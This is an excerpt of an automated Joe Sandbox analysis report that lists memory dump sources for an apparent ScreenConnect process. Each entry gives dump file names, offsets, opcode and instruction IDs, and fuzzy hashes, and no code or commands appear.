                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d8e0f7f3cb7b74d84dca85a7d50c131be443f7683544bbf25ee2b6e82d4bcfb2
                                                                                                                                                                                                                                                          • Instruction ID: b622ba6e786a9f0ad040f45c2950b69fea9de842a76ced0bc9b0ff885993c1c5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8e0f7f3cb7b74d84dca85a7d50c131be443f7683544bbf25ee2b6e82d4bcfb2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA01A9363410008FC308DB7EF8908ADBBA6FBC8261318846BE409CB322CA32AC17C754
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: bdfc6f44a7396809b7ed83ff68900df28f65d5228ef4a8a42ef0a3584c1c17ad
                                                                                                                                                                                                                                                          • Instruction ID: 745dc0b72d226ba21df01a236a70ee1c6a1d81b372dec23dc026dfbb1a53217b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdfc6f44a7396809b7ed83ff68900df28f65d5228ef4a8a42ef0a3584c1c17ad
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 131125217003185FCB11EA7D8440B5EB7E9AFCA590B0580ADD009CF355DB30DD0583A2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1900276926.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_fcd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                                                                                                                                                                                                                                          • Instruction ID: 196490baa6955e6cacb0d096334ca2e87989fdfc4d90c3948e807e84373556bd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A711D376904284CFCB16CF10DAC4B1ABF72FB94324F24C6ADD8494B656C336D85ADBA1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9d6482b4fbd81b32b48aa39dd6322cc1e77ebc5a21b885aa54b3055a38aa917e
                                                                                                                                                                                                                                                          • Instruction ID: 46df28821fddd43cd8daf6e0f269657893f1b4378a4e4e73fd5822f86e4adf60
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d6482b4fbd81b32b48aa39dd6322cc1e77ebc5a21b885aa54b3055a38aa917e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F62106B28102499FDB10CF9AC444BEEFBF4FB48720F14842AD919A7240D3B8A545CFA5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3c86870b34aa75f399103d434a70a277ec95ba1d747485338485fdf83367f5a4
                                                                                                                                                                                                                                                          • Instruction ID: b225ed299dbb0af1a94b7c03efa8f340255f5420bb9c79624003b36a69c5bef7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c86870b34aa75f399103d434a70a277ec95ba1d747485338485fdf83367f5a4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6511517590021A9FCF01DFA4C880ADEBBF1FF4A314F108155E504FB251E771AA06CB91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4c4c4fe2b4f9e9dd25226b0dc55eb294dfb39c520102ea6ec8d4bf3f804dc6a7
                                                                                                                                                                                                                                                          • Instruction ID: 55a6de383bca48d6db8276737d0ee17234ed0738d6ac67c5a06d628dc6bd0255
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c4c4fe2b4f9e9dd25226b0dc55eb294dfb39c520102ea6ec8d4bf3f804dc6a7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D2136B2C002598FDB20CF9AC444BDEFBF4FB48320F10846AD558A7240D378A545CFA5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c9538d6f66196d0cfbf8f3517dd6e02c6932f385b5e018ae9d716b397681b45d
                                                                                                                                                                                                                                                          • Instruction ID: f3c5af3e01ab5c9cb26dd4f55ea76fe3915d49df2d95f82d6a0423ace6a5d76f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9538d6f66196d0cfbf8f3517dd6e02c6932f385b5e018ae9d716b397681b45d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E11523690020ADFCF00DFA4D9409DEBBF5FF49314B108569E504BB250E771AE0ACBA0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d6f8e5046e18892c095490226e21d55ddccca2636e3dfa38216150fed95a54e6
                                                                                                                                                                                                                                                          • Instruction ID: 7529b352fb1b029b061d0e0aed2af3459f846462574c8aed88e4a7c9a79ece53
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6f8e5046e18892c095490226e21d55ddccca2636e3dfa38216150fed95a54e6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9017172300A0A2BC305E679A952A6EBBD6FFC4560710852DD91A8B340EF31DD059796
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0a7c88216868e7abe1ee7f6b8b7b28ed6024f33824546c4fec129e2c9bc9eb8f
                                                                                                                                                                                                                                                          • Instruction ID: 5e3e79899273038d5e53f11ad91d701d2077204971969560e3402fb365383998
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a7c88216868e7abe1ee7f6b8b7b28ed6024f33824546c4fec129e2c9bc9eb8f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C101A271B003195F8B159E9DA8444AFBBE9FB84A64314896EE505DB301EFB1DD068BD0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 385985f119925ee7f448d03f46b8ccd3e12eeac9e2c6674f09394c983ede1422
                                                                                                                                                                                                                                                          • Instruction ID: 821bd16130ae96dd69a9fca453cd869f1703757f6daf102609ac24cac31532f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 385985f119925ee7f448d03f46b8ccd3e12eeac9e2c6674f09394c983ede1422
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF017B729083456FD716ABB8982579D3FE0EF87210F0108DFC046CB352D9348406979A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ce21710f42ebc8d670fd873274f5f3b4cc65900da40aa94a4b0efcfaf52eca1b
                                                                                                                                                                                                                                                          • Instruction ID: 3a0db5122e8993a9d9f4c7f9f7264db0b644b5c2aee3bb18075162cd60679ba1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce21710f42ebc8d670fd873274f5f3b4cc65900da40aa94a4b0efcfaf52eca1b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D30144728496408FC3028BB8ECC72D8BBE0EE42621B4804AFC184CB202E67D154BCB82
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1900276926.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_fcd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 04e338efb6aa01ac80a9f1a6a6176e7956008b86845e14445710ffcfb7d1cf0f
                                                                                                                                                                                                                                                          • Instruction ID: da2b89a8350821f9f7c1f15718fe53aee7bc31fd94959ea442941ed35fcd38ee
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04e338efb6aa01ac80a9f1a6a6176e7956008b86845e14445710ffcfb7d1cf0f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8101F732448305ABE7204A29CE81F6BBBD8DF41334F18C02EED480B186C2799845EAB1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1900276926.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_fcd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6e007eafa1694d54eb0df887dfaf58d50789d8efd25dfca072a2472477d9b523
                                                                                                                                                                                                                                                          • Instruction ID: bb65a84cc3e32723d476b38012134c4a4b8ecdbe988c07b0210130bb0f9882b0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e007eafa1694d54eb0df887dfaf58d50789d8efd25dfca072a2472477d9b523
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C201406140E3C09FD7128B258D94B56BFB4DF53224F19C1DBD8888F1E7C2695849DB72
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b9d49ed54de9de1ebb43d1f2c7adfac32fcdc4c997a5cb4519097af5094a49b5
                                                                                                                                                                                                                                                          • Instruction ID: 697539f0371031d98bab8f0697a226e3739a1cab61ddf52c8dd31b695a44f604
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9d49ed54de9de1ebb43d1f2c7adfac32fcdc4c997a5cb4519097af5094a49b5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF0AF6180E3D8AFDB03EF78E9601D87FB4DE43114B1640CBD084CB163EA200E09D79A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d01e7543df39077d8fc9e7541b76886c1adcebadb3c79008983de64944e71dd8
                                                                                                                                                                                                                                                          • Instruction ID: 5734974041ba8731cdc04c1688d2de7e93e7552b6216ee84a542fa6b7794703e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d01e7543df39077d8fc9e7541b76886c1adcebadb3c79008983de64944e71dd8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14013676B0011A9FCF54EA9DD8009FFB7B9EF84211B00817BE919D7200E734EA1587E1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e76e64386fa5dfa1d954e2bf5ce1f7f719cda3505e7449d1d95394831c5caa38
                                                                                                                                                                                                                                                          • Instruction ID: cdd633f6c380441241b6f5928c2bb9462809b5be2f4bb38f8eba206688efb32b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e76e64386fa5dfa1d954e2bf5ce1f7f719cda3505e7449d1d95394831c5caa38
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F0F4313043555FD711DB7CD880B5A7FE5EF866B0B0446A9E458CB295D731DC02C791
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 78df6d9edb42360c1c7d7189bc4aa6ba5e2bebd2ce8baafa56472dd5fce75155
                                                                                                                                                                                                                                                          • Instruction ID: 51af30c3fe70cb93411f7c35dbaedd84307025ff2b3902dd334febd59468d504
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78df6d9edb42360c1c7d7189bc4aa6ba5e2bebd2ce8baafa56472dd5fce75155
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91F0FC372042086FCF029FA8DC119DF3FABEF88360B144029F909D7251CB714C1197A5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: cfb10b5807c2fa5beb47809bad7229ff30fe1d582de32079a0e9cf0ad3b225de
                                                                                                                                                                                                                                                          • Instruction ID: 35248718c9cd97978c74f0f11002d518fcc5e966419e1bc501981059470ba32f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfb10b5807c2fa5beb47809bad7229ff30fe1d582de32079a0e9cf0ad3b225de
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B01D67160425A9FCB55EBB9D800AFFBBB9EFC6200B04C1BBD815D7641EB349A05C7A1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7b12d48d0affc9aef210e2b7679e23c93a65e4e4a0db857b03ebbb5c4b07eb5b
                                                                                                                                                                                                                                                          • Instruction ID: 915eec82a7b43178c5c602e854a948769d564689b401aadbd266277a22583659
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b12d48d0affc9aef210e2b7679e23c93a65e4e4a0db857b03ebbb5c4b07eb5b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47012832D0125D9BCB04EFA9E8049CEFBB6FF89314F05842AE505BB250DB306916CBA0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e84c3f4cef96a45401b0548faafe42a93e266ae4f023846d0f6e36209c71079b
                                                                                                                                                                                                                                                          • Instruction ID: a1d801f76a339a293505395ab5b2e9a6ba7278e69c8f71ad4db4348e4b86ed56
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e84c3f4cef96a45401b0548faafe42a93e266ae4f023846d0f6e36209c71079b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFF05E34A092059FD745CFA8D855A1EBBB5EF86300B24C4AAE904CB292DB329D16D790
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a8fb453ede5c76c7fffdf4c1b175a49dfd5a815b73b7debea0d1200ad8e0b377
                                                                                                                                                                                                                                                          • Instruction ID: 46d492069dba324601f71a2a858a639562d157a46d1c7bc355e4bca77021709e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8fb453ede5c76c7fffdf4c1b175a49dfd5a815b73b7debea0d1200ad8e0b377
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F08C37B0D2085FDB28CABEA401A9BBBDECBC4620B14C0BFE54DC3740E931A4008764
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fc0516f217673818e2a63af9a20eb91b75919ae083053171f271efd2c0daf0f8
                                                                                                                                                                                                                                                          • Instruction ID: 2245ee894b0953b31d7894c1969c0bca97df94170ce0dcffb3d0a5fb2b4e07fd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc0516f217673818e2a63af9a20eb91b75919ae083053171f271efd2c0daf0f8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99F09032300204ABD714DAA8E940E5FB7EAEFC46B0B14852AF819DB394DBB1DE018794
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: de6243ef73da7d1401daef28e8828f0cf7ba9abf94ffeaac3ccda77b6c413984
                                                                                                                                                                                                                                                          • Instruction ID: 00f44c9cf52cb7577219c45ae042875ab46f55c1f0e18335d89236655b7f6bdd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de6243ef73da7d1401daef28e8828f0cf7ba9abf94ffeaac3ccda77b6c413984
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F05E323003196F9710DAADD840E5BB7E9EF846B4714852AF419CB390DB71ED4187A4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2fa4bffea542ea9d0f538567e170a313ce4f5140e3a3697100918df4ee580756
                                                                                                                                                                                                                                                          • Instruction ID: 45b4423284216b152084caef43bf4ccdb766460e15fcd3073e2eed80d5333957
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fa4bffea542ea9d0f538567e170a313ce4f5140e3a3697100918df4ee580756
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BF0B4325093409FC7126B74A82549F7BA2EFC266070589BFD0068F682DA658C069FD2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 95929c2972793174078f872d1845a78874cd0e858ab19b9205034c54e8bdc17e
                                                                                                                                                                                                                                                          • Instruction ID: 9e4e281c5138490a51a87e0a98773fc2b16721cfe9cd500f99be6a0b5f6fdff3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95929c2972793174078f872d1845a78874cd0e858ab19b9205034c54e8bdc17e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BF03770A0020CEFDF80EFE8D84569CBBF1FB01640F1080A8C505EB240DB346E41EB41
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8806cbb1437f97149635848fad307b6b39f8fca092d4bf67be67c54e4b3ce49a
                                                                                                                                                                                                                                                          • Instruction ID: 533308abdfa2489dbc93703c270e11fb86aa997ecf21292d949c5208912d27f9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8806cbb1437f97149635848fad307b6b39f8fca092d4bf67be67c54e4b3ce49a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDF03C70908248EFDF81EFA8D88539CBFF1FB02640F148499C505DB251D7345A45EB42
